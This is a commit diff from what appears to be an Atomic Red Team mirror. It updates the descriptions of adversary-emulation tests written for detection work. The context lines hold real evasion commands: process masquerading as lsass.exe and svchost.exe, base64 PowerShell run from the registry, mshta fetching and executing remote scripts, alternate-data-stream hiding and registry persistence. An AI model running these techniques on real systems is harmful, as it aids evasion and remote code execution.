security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-03-19 19:17:26 +00:00
parent 1f74427802
commit 8a99c40601
7 changed files with 60 additions and 58 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1027/T1027.md
+1 -1
View File
@@ -50,6 +50,7 @@ chmod +x /tmp/art.sh
## Atomic Test #2 - Execute base64-encoded PowerShell
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
Upon execution the test will print "Hey, Atomic!" to the PowerShell session
**Supported Platforms:** Windows
@@ -70,7 +71,6 @@ $OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand
```
atomics/T1036/T1036.md
+4 -2
View File
@@ -41,6 +41,7 @@ An example of abuse of trusted locations in Linux would be the <code>/bin</code
## Atomic Test #1 - Masquerading as Windows LSASS process
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
**Supported Platforms:** Windows
@@ -52,8 +53,8 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas
```cmd
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
```
#### Cleanup Commands:
@@ -124,6 +125,7 @@ del /Q /F %APPDATA%\notepad.exe >nul 2>&1
## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
**Supported Platforms:** Windows
atomics/T1096/T1096.md
+1
View File
@@ -57,6 +57,7 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
## Atomic Test #2 - Store file in Alternate Data Stream (ADS)
Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test
**Supported Platforms:** Windows
atomics/T1112/T1112.md
+1 -1
View File
@@ -262,7 +262,7 @@ Remove-item $key -Recurse -ErrorAction Ignore
<br/>
## Atomic Test #7 - Javascript in registry
placing javascript in registry for persistence
Upon execution, a javascript block will be placed in the registry for persistence
**Supported Platforms:** Windows
atomics/T1170/T1170.md
+2
View File
@@ -25,6 +25,7 @@ Mshta.exe can be used to bypass application whitelisting solutions that do not a
## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
Test execution of a remote script using mshta.exe
Upon execution calc.exe will be launched
**Supported Platforms:** Windows
@@ -108,6 +109,7 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit
## Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)
Execute an arbitrary remote HTA.
Upon execution calc.exe will be launched
**Supported Platforms:** Windows
atomics/T1202/T1202.md
+3 -6
View File
@@ -15,8 +15,8 @@ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.
## Atomic Test #1 - Indirect Command Execution - pcalua.exe
The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface.
[Reference](https://twitter.com/KyleHanslovan/status/912659279806640128)
Upon execution, calc.exe should open
**Supported Platforms:** Windows
@@ -27,8 +27,7 @@ The Program Compatibility Assistant (pcalua.exe) may invoke the execution of pro
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process | Process to execute | string | calc.exe|
| payload_path | Path to payload | path | c:&#92;temp&#92;payload.dll|
| payload_cpl_path | Path to payload | path | C:&#92;Windows&#92;system32&#92;javacpl.cpl -c Java|
| payload_path | Path to payload | path | C:&#92;Windows&#92;System32&#92;calc.exe|
#### Attack Commands: Run with `command_prompt`!
@@ -37,7 +36,6 @@ The Program Compatibility Assistant (pcalua.exe) may invoke the execution of pro
```cmd
pcalua.exe -a #{process}
pcalua.exe -a #{payload_path}
pcalua.exe -a #{payload_cpl_path}
```
@@ -50,10 +48,9 @@ pcalua.exe -a #{payload_cpl_path}
## Atomic Test #2 - Indirect Command Execution - forfiles.exe
forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface.
[Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md)
"This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe"
Upon execution calc.exe will be opened
**Supported Platforms:** Windows
atomics/index.yaml
+48 -48
View File
@@ -8748,8 +8748,8 @@ defense-evasion:
- name: Indirect Command Execution - pcalua.exe
description: |
The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface.
[Reference](https://twitter.com/KyleHanslovan/status/912659279806640128)
Upon execution, calc.exe should open
supported_platforms:
- windows
input_arguments:
@@ -8760,24 +8760,19 @@ defense-evasion:
payload_path:
description: Path to payload
type: path
default: c:\temp\payload.dll
payload_cpl_path:
description: Path to payload
type: path
default: C:\Windows\system32\javacpl.cpl -c Java
default: C:\Windows\System32\calc.exe
executor:
name: command_prompt
elevation_required: false
command: |
pcalua.exe -a #{process}
pcalua.exe -a #{payload_path}
pcalua.exe -a #{payload_cpl_path}
- name: Indirect Command Execution - forfiles.exe
description: |
forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface.
[Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md)
"This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe"
Upon execution calc.exe will be opened
supported_platforms:
- windows
input_arguments:
@@ -8787,6 +8782,7 @@ defense-evasion:
default: calc.exe
executor:
name: command_prompt
elevation_required: false
command: |
forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
@@ -9672,18 +9668,17 @@ defense-evasion:
identifier: T1036
atomic_tests:
- name: Masquerading as Windows LSASS process
description: 'Copies cmd.exe, renames it, and launches it to masquerade as an
instance of lsass.exe.
'
description: |
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
'
@@ -9717,10 +9712,9 @@ defense-evasion:
'
- name: Masquerading - wscript.exe running as svchost.exe
description: 'Copies wscript.exe, renames it, and launches it to masquerade
as an instance of svchost.exe.
'
description: |
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
supported_platforms:
- windows
executor:
@@ -10073,7 +10067,8 @@ defense-evasion:
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
Remove-item $key -Recurse -ErrorAction Ignore
- name: Javascript in registry
description: 'placing javascript in registry for persistence
description: 'Upon execution, a javascript block will be placed in the registry
for persistence
'
supported_platforms:
@@ -10085,8 +10080,10 @@ defense-evasion:
Settings" -Name T1112 -Value "<script>"
'
cleanup_command: Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
cleanup_command: 'Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -ErrorAction Ignore
'
T1170:
technique:
x_mitre_data_sources:
@@ -10176,9 +10173,9 @@ defense-evasion:
identifier: T1170
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: 'Test execution of a remote script using mshta.exe
'
description: |
Test execution of a remote script using mshta.exe
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments:
@@ -10189,8 +10186,9 @@ defense-evasion:
executor:
name: command_prompt
elevation_required: false
command: "mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
\ \n"
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
'
- name: Mshta calls a local VBScript file to launch notepad.exe
description: Tests execution of a local program by a VBScript file called by
Mshta
@@ -10220,9 +10218,9 @@ defense-evasion:
'
- name: Mshta Executes Remote HTML Application (HTA)
description: 'Execute an arbitrary remote HTA.
'
description: |
Execute an arbitrary remote HTA.
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments:
@@ -10354,10 +10352,9 @@ defense-evasion:
expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
- name: Store file in Alternate Data Stream (ADS)
description: 'Storing files in Alternate Data Stream (ADS) similar to Astaroth
malware.
'
description: |
Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test
supported_platforms:
- windows
input_arguments:
@@ -10382,7 +10379,9 @@ defense-evasion:
New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
}
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
cleanup_command: Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
'
T1126:
technique:
x_mitre_data_sources:
@@ -10612,10 +10611,9 @@ defense-evasion:
chmod +x /tmp/art.sh
/tmp/art.sh
- name: Execute base64-encoded PowerShell
description: 'Creates base64-encoded PowerShell code and executes it. This is
used by numerous adversaries and malicious tools.
'
description: |
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
Upon execution the test will print "Hey, Atomic!" to the PowerShell session
supported_platforms:
- windows
input_arguments:
@@ -10631,7 +10629,6 @@ defense-evasion:
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand
- name: Execute base64-encoded PowerShell from Windows Registry
description: 'Stores base64-encoded PowerShell code in the Windows Registry
@@ -10666,7 +10663,9 @@ defense-evasion:
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage}
-Name #{registry_entry_storage}'
-Name #{registry_entry_storage}
'
T1502:
technique:
x_mitre_data_sources:
@@ -22859,9 +22858,9 @@ execution:
identifier: T1170
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: 'Test execution of a remote script using mshta.exe
'
description: |
Test execution of a remote script using mshta.exe
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments:
@@ -22872,8 +22871,9 @@ execution:
executor:
name: command_prompt
elevation_required: false
command: "mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
\ \n"
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
'
- name: Mshta calls a local VBScript file to launch notepad.exe
description: Tests execution of a local program by a VBScript file called by
Mshta
@@ -22903,9 +22903,9 @@ execution:
'
- name: Mshta Executes Remote HTML Application (HTA)
description: 'Execute an arbitrary remote HTA.
'
description: |
Execute an arbitrary remote HTA.
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments: